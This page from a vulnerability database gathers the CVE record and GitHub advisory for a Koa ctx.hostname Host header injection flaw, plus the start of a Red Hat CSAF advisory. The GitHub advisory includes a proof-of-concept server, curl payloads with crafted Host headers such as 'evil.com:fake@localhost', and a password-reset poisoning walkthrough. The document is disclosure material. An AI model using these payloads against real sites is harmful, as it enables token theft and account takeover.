Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-27959 (GCVE-0-2026-27959)
Vulnerability from cvelistv5 – Published: 2026-02-26 01:45 – Updated: 2026-02-26 19:32- CWE-20 - Improper Input Validation
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27959",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-26T19:31:17.215940Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T19:32:00.105Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "koa",
"vendor": "koajs",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.1.2"
},
{
"status": "affected",
"version": "\u003c 2.16.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa\u0027s `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T01:45:45.668Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
},
{
"name": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
},
{
"name": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
}
],
"source": {
"advisory": "GHSA-7gcc-r8m5-44qm",
"discovery": "UNKNOWN"
},
"title": "Koa has Host Header Injection via `ctx.hostname`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27959",
"datePublished": "2026-02-26T01:45:45.668Z",
"dateReserved": "2026-02-25T03:24:57.792Z",
"dateUpdated": "2026-02-26T19:32:00.105Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-27959",
"date": "2026-04-16",
"epss": "0.00145",
"percentile": "0.34969"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-27959\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-26T02:16:23.317\",\"lastModified\":\"2026-02-28T00:55:26.413\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa\u0027s `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"2.16.14\",\"matchCriteriaId\":\"47B8F313-898E-4B6D-936A-8F35AC7E7C20\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.1.2\",\"matchCriteriaId\":\"D5367576-B8D5-45EE-9214-D40A4E6E1049\"}]}]}],\"references\":[{\"url\":\"https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27959\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-26T19:31:17.215940Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-26T19:31:35.224Z\"}}], \"cna\": {\"title\": \"Koa has Host Header Injection via `ctx.hostname`\", \"source\": {\"advisory\": \"GHSA-7gcc-r8m5-44qm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"koajs\", \"product\": \"koa\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.1.2\"}, {\"status\": \"affected\", \"version\": \"\u003c 2.16.4\"}]}], \"references\": [{\"url\": \"https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm\", \"name\": \"https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df\", \"name\": \"https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb\", \"name\": \"https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa\u0027s `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-26T01:45:45.668Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-27959\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-26T19:32:00.105Z\", \"dateReserved\": \"2026-02-25T03:24:57.792Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-26T01:45:45.668Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-7GCC-R8M5-44QM
Vulnerability from github – Published: 2026-02-26 22:42 – Updated: 2026-02-26 22:42Summary
Koa's ctx.hostname API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a @ symbol (e.g., evil.com:fake@legitimate.com) is received, ctx.hostname returns evil.com - an attacker-controlled value. Applications using ctx.hostname for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.
Details
The vulnerability exists in Koa's hostname getter in lib/request.js:
// Koa 2.16.1 - lib/request.js
get hostname() {
const host = this.host;
if (!host) return '';
if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal
return host.split(':', 1)[0];
}
The host getter retrieves the raw header value with HTTP/2 and proxy support:
// Koa 2.16.1 - lib/request.js
get host() {
const proxy = this.app.proxy;
let host = proxy && this.get('X-Forwarded-Host');
if (!host) {
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
if (!host) host = this.get('Host');
}
if (!host) return '';
return host.split(',')[0].trim();
}
The Problem
The parsing logic simply splits on the first : and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.
RFC 3986 Section 3.2.2 defines the host component as:
host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
The @ character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.
Attack Vector
When an attacker sends:
Host: evil.com:fake@legitimate.com:3000
Koa parses this as:
| API | Returns | Notes |
|---|---|---|
ctx.get('Host') |
"evil.com:fake@legitimate.com:3000" |
Raw header |
ctx.hostname |
"evil.com" |
Attacker-controlled |
ctx.host |
"evil.com:fake@legitimate.com:3000" |
Raw header value |
ctx.origin |
"http://evil.com:fake@legitimate.com:3000" |
Protocol + malformed host |
The ctx.hostname API returns evil.com because the parser splits on the first : without understanding that evil.com:fake@legitimate.com is a malformed authority component where evil.com:fake would be interpreted as userinfo by a proper URI parser.
Additional Concern: ctx.origin
Koa's ctx.origin property concatenates protocol and host without validation:
// lib/request.js
get origin() {
return `${this.protocol}://${this.host}`;
}
Applications using ctx.origin for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.
HTTP/2 Consideration
Koa explicitly checks httpVersionMajor >= 2 to read the :authority pseudo-header:
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
The same vulnerability applies - malformed :authority values containing userinfo would be accepted and parsed identically.
PoC
Setup
// server.js
const Koa = require('koa');
const app = new Koa();
// Simulates password reset URL generation (common vulnerable pattern)
app.use(async ctx => {
if (ctx.path === '/forgot-password') {
const resetToken = 'abc123securtoken';
const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;
ctx.body = {
message: 'Password reset link generated',
resetUrl: resetUrl,
debug: {
rawHost: ctx.get('Host'),
parsedHostname: ctx.hostname,
origin: ctx.origin,
protocol: ctx.protocol
}
};
}
});
app.listen(3000, () => console.log('Server on http://localhost:3000'));
Exploit
curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password
Result
{
"message": "Password reset link generated",
"resetUrl": "http://evil.com/reset?token=abc123securtoken",
"debug": {
"rawHost": "evil.com:fake@localhost:3000",
"parsedHostname": "evil.com",
"origin": "http://evil.com:fake@localhost:3000",
"protocol": "http"
}
}
The password reset URL points to evil.com instead of the legitimate server. In a real attack:
- Attacker requests password reset for victim's email with malicious Host header
- Server generates reset link using
ctx.hostname→https://evil.com/reset?token=SECRET - Victim receives email with poisoned link
- Victim clicks link, token is sent to attacker's server
- Attacker uses token to reset victim's password
Additional Test Cases
# Basic injection
curl -H "Host: evil.com:x@legitimate.com" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
# With port preservation attempt
curl -H "Host: evil.com:443@legitimate.com:3000" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
# Unicode/encoded variations
curl -H "Host: evil.com:x%40legitimate.com" http://localhost:3000/forgot-password
# Result: hostname = "evil.com"
Deployment Consideration
For this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:
- No reverse proxy - Application directly exposed to internet
- Misconfigured proxy - Proxy doesn't override/validate Host header
- Proxy trust enabled (
app.proxy = true) -X-Forwarded-Hostcan be injected - Default virtual host - Server is the catch-all for unrecognized Host headers
Impact
Vulnerability Type
- CWE-20: Improper Input Validation
- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax
Attack Scenarios
1. Password Reset Poisoning (High Severity) - Attacker hijacks password reset tokens by poisoning reset URLs - Requires victim to click link in email - Results in account takeover
2. Email Verification Bypass - Attacker poisons email verification links - Can verify attacker-controlled email on victim accounts
3. OAuth/SSO Callback Manipulation
- Applications using ctx.hostname for OAuth redirect URIs
- Attacker redirects OAuth callbacks to malicious server
- Results in token theft
4. Web Cache Poisoning - If responses are cached without Host in cache key - Poisoned URLs served to all users - Persistent XSS/phishing via cached responses
5. Server-Side Request Forgery (SSRF)
- Internal routing decisions based on ctx.hostname
- Attacker manipulates which backend receives requests
Who Is Impacted
- Direct impact: Any Koa application using
ctx.hostnameorctx.originfor URL generation without additional validation - Common patterns: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "koa"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.1.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "koa"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.16.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27959"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-26T22:42:57Z",
"nvd_published_at": "2026-02-26T02:16:23Z",
"severity": "HIGH"
},
"details": "## Summary\n\nKoa\u0027s `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.\n\n## Details\n\nThe vulnerability exists in Koa\u0027s hostname getter in `lib/request.js`:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget hostname() {\n const host = this.host;\n if (!host) return \u0027\u0027;\n if (\u0027[\u0027 === host[0]) return this.URL.hostname || \u0027\u0027; // IPv6 literal\n return host.split(\u0027:\u0027, 1)[0];\n}\n```\n\nThe `host` getter retrieves the raw header value with HTTP/2 and proxy support:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget host() {\n const proxy = this.app.proxy;\n let host = proxy \u0026\u0026 this.get(\u0027X-Forwarded-Host\u0027);\n if (!host) {\n if (this.req.httpVersionMajor \u003e= 2) host = this.get(\u0027:authority\u0027);\n if (!host) host = this.get(\u0027Host\u0027);\n }\n if (!host) return \u0027\u0027;\n return host.split(\u0027,\u0027)[0].trim();\n}\n```\n\n### The Problem\n\nThe parsing logic simply splits on the first `:` and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.\n\n**RFC 3986 Section 3.2.2** defines the host component as:\n\n```\nhost = IP-literal / IPv4address / reg-name\nreg-name = *( unreserved / pct-encoded / sub-delims )\nunreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\"\nsub-delims = \"!\" / \"$\" / \"\u0026\" / \"\u0027\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\"\n```\n\nThe `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.\n\n### Attack Vector\n\nWhen an attacker sends:\n\n```\nHost: evil.com:fake@legitimate.com:3000\n```\n\nKoa parses this as:\n\n| API | Returns | Notes |\n|-----|---------|-------|\n| `ctx.get(\u0027Host\u0027)` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header |\n| `ctx.hostname` | `\"evil.com\"` | **Attacker-controlled** |\n| `ctx.host` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header value |\n| `ctx.origin` | `\"http://evil.com:fake@legitimate.com:3000\"` | Protocol + malformed host |\n\nThe `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser.\n\n### Additional Concern: `ctx.origin`\n\nKoa\u0027s `ctx.origin` property concatenates protocol and host without validation:\n\n```javascript\n// lib/request.js\nget origin() {\n return `${this.protocol}://${this.host}`;\n}\n```\n\nApplications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.\n\n### HTTP/2 Consideration\n\nKoa explicitly checks `httpVersionMajor \u003e= 2` to read the `:authority` pseudo-header:\n\n```javascript\nif (this.req.httpVersionMajor \u003e= 2) host = this.get(\u0027:authority\u0027);\n```\n\nThe same vulnerability applies - malformed `:authority` values containing userinfo would be accepted and parsed identically.\n\n## PoC\n\n### Setup\n\n```javascript\n// server.js\nconst Koa = require(\u0027koa\u0027); \nconst app = new Koa();\n\n// Simulates password reset URL generation (common vulnerable pattern)\napp.use(async ctx =\u003e {\n if (ctx.path === \u0027/forgot-password\u0027) {\n const resetToken = \u0027abc123securtoken\u0027;\n const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;\n \n ctx.body = {\n message: \u0027Password reset link generated\u0027,\n resetUrl: resetUrl,\n debug: {\n rawHost: ctx.get(\u0027Host\u0027),\n parsedHostname: ctx.hostname,\n origin: ctx.origin,\n protocol: ctx.protocol\n }\n };\n }\n});\n\napp.listen(3000, () =\u003e console.log(\u0027Server on http://localhost:3000\u0027));\n```\n\n### Exploit\n\n```bash\ncurl -H \"Host: evil.com:fake@localhost:3000\" http://localhost:3000/forgot-password\n```\n\n### Result\n\n```json\n{\n \"message\": \"Password reset link generated\",\n \"resetUrl\": \"http://evil.com/reset?token=abc123securtoken\",\n \"debug\": {\n \"rawHost\": \"evil.com:fake@localhost:3000\",\n \"parsedHostname\": \"evil.com\",\n \"origin\": \"http://evil.com:fake@localhost:3000\",\n \"protocol\": \"http\"\n }\n}\n```\n\nThe password reset URL points to `evil.com` instead of the legitimate server. In a real attack:\n\n1. Attacker requests password reset for victim\u0027s email with malicious Host header\n2. Server generates reset link using `ctx.hostname` \u2192 `https://evil.com/reset?token=SECRET`\n3. Victim receives email with poisoned link\n4. Victim clicks link, token is sent to attacker\u0027s server\n5. Attacker uses token to reset victim\u0027s password\n\n### Additional Test Cases\n\n```bash\n# Basic injection\ncurl -H \"Host: evil.com:x@legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n\n# With port preservation attempt\ncurl -H \"Host: evil.com:443@legitimate.com:3000\" http://localhost:3000/forgot-password \n# Result: hostname = \"evil.com\"\n\n# Unicode/encoded variations\ncurl -H \"Host: evil.com:x%40legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n```\n\n### Deployment Consideration\n\nFor this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:\n\n1. **No reverse proxy** - Application directly exposed to internet\n2. **Misconfigured proxy** - Proxy doesn\u0027t override/validate Host header\n3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected\n4. **Default virtual host** - Server is the catch-all for unrecognized Host headers\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-20: Improper Input Validation\n- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax\n\n### Attack Scenarios\n\n**1. Password Reset Poisoning (High Severity)**\n- Attacker hijacks password reset tokens by poisoning reset URLs\n- Requires victim to click link in email\n- Results in account takeover\n\n**2. Email Verification Bypass**\n- Attacker poisons email verification links\n- Can verify attacker-controlled email on victim accounts\n\n**3. OAuth/SSO Callback Manipulation**\n- Applications using `ctx.hostname` for OAuth redirect URIs\n- Attacker redirects OAuth callbacks to malicious server\n- Results in token theft\n\n**4. Web Cache Poisoning**\n- If responses are cached without Host in cache key\n- Poisoned URLs served to all users\n- Persistent XSS/phishing via cached responses\n\n**5. Server-Side Request Forgery (SSRF)**\n- Internal routing decisions based on `ctx.hostname`\n- Attacker manipulates which backend receives requests\n\n### Who Is Impacted\n\n- **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation\n- **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations",
"id": "GHSA-7gcc-r8m5-44qm",
"modified": "2026-02-26T22:42:57Z",
"published": "2026-02-26T22:42:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
},
{
"type": "WEB",
"url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
},
{
"type": "WEB",
"url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
},
{
"type": "PACKAGE",
"url": "https://github.com/koajs/koa"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Koa has Host Header Injection via ctx.hostname"
}
RHSA-2026:7249
Vulnerability from csaf_redhat - Published: 2026-04-16 10:18 - Updated: 2026-04-16 15:20A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in Koa’s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.19.28 is now available with updates to packages and images that fix several bugs and add enhancements.\n\n This release includes a security update for Red Hat OpenShift Container Platform 4.19.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the container images for Red Hat OpenShift Container Platform 4.19.28. See the following advisory for the RPM packages for this release:\n\nhttps://access.redhat.com/errata/RHBA-2026:7241\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:7249",
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27959",
"url": "https://access.redhat.com/security/cve/CVE-2026-27959"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_7249.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.19.28 bug fix and security update",
"tracking": {
"current_release_date": "2026-04-16T15:20:14+00:00",
"generator": {
"date": "2026-04-16T15:20:14+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:7249",
"initial_release_date": "2026-04-16T10:18:08+00:00",
"revision_history": [
{
"date": "2026-04-16T10:18:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-16T10:19:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T15:20:14+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.19",
"product": {
"name": "Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.19::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Container Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
